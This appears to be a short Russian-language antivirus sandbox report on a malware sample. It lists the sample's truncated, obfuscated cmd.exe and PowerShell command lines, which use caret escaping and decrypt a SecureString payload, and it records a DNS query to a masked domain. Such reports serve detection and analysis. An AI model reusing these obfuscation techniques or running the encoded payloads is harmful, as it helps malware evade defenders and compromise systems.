Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' wtjFcBhWEsGYo WnaYHfNWLMBZzMJSk RSBjLoM & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %diTtsHJCYkqEnEJ%=WviHGjYzTuldo&&set %wKBGbfShza%=p&&set %fEAwTsYEsYifbI%=o...
Сетевая активность
UDP
- DNS ASK fq####heuisdqwe.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' wtjFcBhWEsGYo WnaYHfNWLMBZzMJSk RSBjLoM & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %diTtsHJCYkqEnEJ%=WviHGjYzTuldo&&set %wKBGbfShza%=p&&set %fEAwTsYEsYifbI%=o...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "( [RuntImE.InTeropsERvICes.marSHaL]::([rUNTImE.interOPsERvICEs.MArShal].getMemBERS()[2].NAME).INvokE([rUNTImE.inTERoPSERviceS.marsHAl]::SECuRestRiNgTogLOBaLAlLocuNiCODE($('76492d1116743f042341...
